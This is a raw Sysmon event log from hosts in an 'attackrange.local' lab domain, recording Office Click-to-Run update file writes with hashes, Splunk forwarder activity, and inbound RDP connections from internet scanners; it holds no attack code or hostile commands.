Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Filters\api-ms-win-core-file-l1-2-0.dllMD5=F6D1216E974FB76585FD350EBDC30648,SHA256=348B70E57AE0329AC40AC3D866B8E896B0B8FEF7E8809A09566F33AF55D33271,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000071261Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:47.079{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\System\ole db\xmlrwbin.dllMD5=FCBC2253DC6927C4F792F44F805F609D,SHA256=F953813D76D89B11E580561E90541E1CFAAE98E5DAEAEABBBCCE43C3909515A0,IMPHASH=9E54CCC4DB31FA1F3F0DFBD27A4D2A5Atruetrue 23542300x800000000000000071260Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:47.079{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\System\ole db\xmlrw.dllMD5=017F5C59D1570660FCBC09B775922104,SHA256=103C8356181EF954B83E09466796D70FCEC0AF3E048FEE4E152A4A02C010A23F,IMPHASH=1FF0EE6C59291003C7C25125B92B9FABtruetrue 23542300x800000000000000071259Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:47.079{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\System\MSMAPI\1033\MSMAPI32.DLLMD5=43033D77037B203CE5212D83364EAA8A,SHA256=42771F9C6A211C607C37EB1B722304C4ED6ADD95CFE18D34A499A88051A0E0EC,IMPHASH=EC76EBB699F78E1B6BB06CD54BF09B8Btruetrue 23542300x800000000000000071258Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:47.063{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Web Server Extensions\16\BIN\FPWEC.DLLMD5=0781CA0CE6C5583108D6F7AE23907110,SHA256=CA5D3E954E30E43FB0FB80868DCA15980C96A875DE0F9EA7369995D1DAD6FBCD,IMPHASH=03B83182C46B8C5E230EA1847A3F3ECEtruetrue 23542300x800000000000000071257Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:47.048{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Web Server Extensions\16\BIN\FPSRVUTL.DLLMD5=8DADF456466CB8F327FFEE84D103F104,SHA256=7A3F1FF9B468C3B00341771C4253861B78E4E0C7D5E6D53204086ED611E6AEFF,IMPHASH=CA117C92DB6B77BA38AD928747BA4AF0truetrue 23542300x800000000000000071256Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:47.016{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Web Server Extensions\16\BIN\1033\FPEXT.MSGMD5=0AE4DAAE09D2390DB9B6E551BFC11CFB,SHA256=EDD64B3A52776B147EE73CCA9D91753889C814FDD9CAB4DA018164232EF4B05E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000071255Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:47.016{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\VBA\VBA7.1\VBEUIRES.DLLMD5=7C900B160E1CE4C4916774009E8B35F7,SHA256=A75301E30F4A5F5CEB0259D334BF78C43E30B66A55964CF2C5A1E0FE400730E4,IMPHASH=00000000000000000000000000000000truetrue 354300x800000000000000049816Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:55:45.698{85C0FFC9-B863-607E-C500-00000000BB01}1976C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-895.attackrange.local52503-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 354300x800000000000000049815Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:55:45.286{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse80.82.77.234scanner.openportstats.com58952-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 23542300x800000000000000049814Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:55:47.168{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2DF8C5FA801F334A094D3EBAFD2FB7FD,SHA256=F95801A92D23E103ACF6DBFB4E06BD6FB0C5BF81301728FEE204F9C54D7165CA,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000071338Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:47.577{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse80.82.77.85scanner.openportstats.com61787-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 354300x800000000000000071337Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:47.553{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-56346-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 23542300x800000000000000071336Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:48.595{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX86\Microsoft Shared\OFFICE16\MSOIDRES.DLLMD5=DA8DA6EB500E0FB1BDFDA712DA9A4921,SHA256=4A8C0AFD766640ECF59057F518C1B3605B110C3E7E944A0B8318209EA99EAB98,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000071335Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:48.579{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX86\Microsoft Shared\OFFICE16\MSOIDCLIL.DLLMD5=E0A33EBF1175DEE6D434E1D0C26C15F2,SHA256=F2894F8F5DA58464BAEEF07479F7AC6E924DEEBF609BC0121DD5BAE7091EE44C,IMPHASH=7FAB449DA81A525A6782861209DA7E8Etruetrue 23542300x800000000000000071334Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:48.563{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX86\Microsoft Shared\OFFICE16\MSO99LRES.DLLMD5=5F3346131EA39E872F25CB196C7F9A1F,SHA256=A4046EE59B80072EF4B36F5FE9E7F0C0E00DCA3A1FF6C093D129415E9E3C9044,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000071333Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:48.391{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX86\Microsoft Shared\OFFICE16\Mso98win32client.dllMD5=8987F0C0A09ECC5FA716024A48E582C2,SHA256=8FC85FC5648FA59E0FE6889EC72CB182C3E62F4E71CBA38D3CD64198AD04918A,IMPHASH=5C3C7FEC8CB6ECC6A2B8968D94B12FE7truetrue 23542300x800000000000000071332Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:48.235{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=4E68A7BB440022BBDBBB05AC75212823,SHA256=63B49D2D428E45F9B2DBF8856C130D5B9584C7D8E1EC4ADD8341DC92A9868C45,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000071331Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:48.204{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX86\Microsoft Shared\OFFICE16\Mso50win32client.dllMD5=569D6E679E85984C82E363D311D518EC,SHA256=370B31BD389066736674C217F5FEDD49C7664888E7A89856406D45F42CA0177A,IMPHASH=0D6261CD25069D947EA7FC1D33DD13B7truetrue 23542300x800000000000000071330Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:48.188{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX86\Microsoft Shared\OFFICE16\Mso40UIwin32client.dllMD5=E74694FBFFF74CF605AC8D97BB7C7107,SHA256=D8C06F76C38AD6D5548571BFFB9EFA1B4F0F8A25925D69C2699BDBE1A63AD29B,IMPHASH=0BA4365698383256936B952D523BA0F1truetrue 23542300x800000000000000071329Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:48.063{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX86\Microsoft Shared\OFFICE16\MSO40UIRES.DLLMD5=26106FA9123446E0ED60B97D3277BC4D,SHA256=BC7A4A8CC7FEE78B458C613373E67BFE9EE41BD4FFA366E3F2D4852782253FEB,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000071328Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:48.001{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX86\Microsoft Shared\OFFICE16\Mso30win32client.dllMD5=2ED2D66903DBCDD86A367B97E00C5815,SHA256=4371665DECA3DBD7AE80DE5BD905D24E1A634091E4EDF62B7D0995F9DD29ED5B,IMPHASH=76CEA9E5B15D65205636A288076A9114truetrue 23542300x800000000000000049819Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:55:48.496{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=4AD98334C599E084C570472558B78678,SHA256=856269210E312E08A00AE491F7D108CF9E41FA6248493593FB2EEF2450793219,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000049818Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:55:46.307{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-64628-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 23542300x800000000000000049817Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:55:48.184{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7F883D337338F996389C66894E131523,SHA256=233A563D51BBBD3764C2E5503984B6D58F9EFDFAF0551F5F701C73E84242A35A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000071383Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:49.751{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesX64\Microsoft Analysis Services\AS OLEDB\140\Microsoft.AnalysisServices.AzureClient.dllMD5=D29856109FB2EACE37228294CBC1C821,SHA256=12BBC82D304D5A0DDCF8F75B96857856EE210892038954FF152148E4ECBC1307,IMPHASH=DAE02F32A21E03CE65412F6E56942DAAtruetrue 23542300x800000000000000071382Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:49.735{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesX64\Microsoft Analysis Services\AS OLEDB\140\adal.dllMD5=D4A01917B2E16FBB6B753077965D4AC8,SHA256=112700910CC8BF88332E6F7937971DBD6BE544D5B773F9C158C3F1772D48E84B,IMPHASH=792AD43B4F7A5D912D842C00406D74BFtruetrue 23542300x800000000000000071381Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:49.720{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesX64\Microsoft Analysis Services\AS OLEDB\140\Resources\1033\msolui.rllMD5=9F6E063FC5E577D6D5F615022E78CC03,SHA256=900F4D978EC223C792BD16AF17BD4E791150E1E6E02FEC171699B579719CC3C8,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000071380Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:49.720{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesX64\Microsoft Analysis Services\AS OLEDB\140\Resources\1033\msmdsrvi.rllMD5=36287F4AD512E321E4710A17815CE557,SHA256=E581334A94077D76BA9235CA4EF54ED794664DD6F6551966091EFF955522873D,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000071379Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:49.688{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesX64\Microsoft Analysis Services\AS OLEDB\140\Resources\1033\msmdsrv.rllMD5=C5B1A24E66054D56CB10672D68BBB62C,SHA256=86DAB1AA78B208EC0D24EE5AC03295AC5E4B9EB5F0C220857754493E30CE823C,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000071378Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:49.673{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesX64\Microsoft Analysis Services\AS OLEDB\140\Cartridges\trdtv2r41.xslMD5=6428657355471068B16925417AFC4BD4,SHA256=B2540DE757740113FE15DC525C6BA7673D86737D3C755CF93C6BBB1535EF379F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000071377Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:49.673{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesX64\Microsoft Analysis Services\AS OLEDB\140\Cartridges\Sybase.xslMD5=8ADDABEC57AC4EEE13EC50A6D8A3F6F8,SHA256=DB6C6345E95277C1AE5DFE3B175673A727FCF03F4BD2160FB18D657202CEE411,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000071376Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:49.673{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesX64\Microsoft Analysis Services\AS OLEDB\140\Cartridges\sqlpdw.xslMD5=079231B93855C4D5D42C649E67485551,SHA256=1F06E9D328476D2AB54DE14F26E4E0EBE22CFBB1F625AAE8B141C59EC38B5EF3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000071375Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:49.657{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesX64\Microsoft Analysis Services\AS OLEDB\140\Cartridges\sql90.xslMD5=A758C9866B1426B185F1B395101DB8A4,SHA256=4C510DDA5571B8F83FE8DA219D4D42A2A7D692812E1C6A360D38BDC9B4DC5A6A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000071374Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:49.657{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesX64\Microsoft Analysis Services\AS OLEDB\140\Cartridges\sql70.xslMD5=21D63F1CB061AD73CE2BDA2ACC9D299F,SHA256=250C56E4E7F555B0B3D99C1B1E3E6ED556C1A8DA79546ECB5DF38E442A652DFD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000071373Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:49.657{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesX64\Microsoft Analysis Services\AS OLEDB\140\Cartridges\sql2000.xslMD5=C3A33EF6A0C4B793D71D443312BCA0A3,SHA256=2FE08F0C8ABB32B6CBDE10B08A5DCDF7AABFFF8F0E2950A09231CE6CBD2CD1D0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000071372Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:49.657{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesX64\Microsoft Analysis Services\AS OLEDB\140\Cartridges\sql120.xslMD5=53D85F5CA2F3B22242C5A822BB59D03C,SHA256=D1057EF17E2860DD7D3A3C23C29597B346A8652467D24052A44ABB3C57162E3C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000071371Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:49.657{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesX64\Microsoft Analysis Services\AS OLEDB\140\Cartridges\orcl7.xslMD5=D020C13A8316B443A734A426396B681A,SHA256=3D4D2C50391B800E4DF5B5711209080C2EA4EE6D74B18B48357A33D9B501C08A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000071370Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:49.657{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesX64\Microsoft Analysis Services\AS OLEDB\140\Cartridges\msql.xslMD5=CB1DBA9B516A4AD5B75248D623886038,SHA256=741376D61FE7D6B2E6E04F97688C470DBD23D3FC399503017A88020470878894,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000071369Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:49.641{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesX64\Microsoft Analysis Services\AS OLEDB\140\Cartridges\msjet.xslMD5=07817F87945C259A27537F904AC7D4CE,SHA256=4958924C76280F353FAA16E191B596867B454F5AF301CB1C420ED280CDBD4564,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000071368Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:49.641{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesX64\Microsoft Analysis Services\AS OLEDB\140\Cartridges\Informix.xslMD5=52449767449CEF651386A81FB888E650,SHA256=40BC6D9B6D6DAEFB182732DFB28CB29B7304780E2A28C24BB4E827795B1FF5F9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000071367Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:49.641{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesX64\Microsoft Analysis Services\AS OLEDB\140\Cartridges\hive.xslMD5=1E6D16E1C46BF192BFA7338DBD7122C5,SHA256=B767A68FA7E73AB32058D77C4786D72D155117437F49CEF5E6A4518460669188,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000071366Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:49.641{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesX64\Microsoft Analysis Services\AS OLEDB\140\Cartridges\db2v0801.xslMD5=E7705BA3F0FB6C7F481F2DE537576A79,SHA256=E98A1A4F6D96F4DD6A0D30800E010845A3476AEF08E6CFE8A4233A56759CE4CB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000071365Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:49.641{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesX64\Microsoft Analysis Services\AS OLEDB\140\Cartridges\as90.xslMD5=7657CD6E4B01A396B99BAF6F5D52F222,SHA256=26C5A0FE600571F341FA4978A13723556E4953C28D4BFCB5D6D7BD041CDF07C9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000071364Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:49.641{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesX64\Microsoft Analysis Services\AS 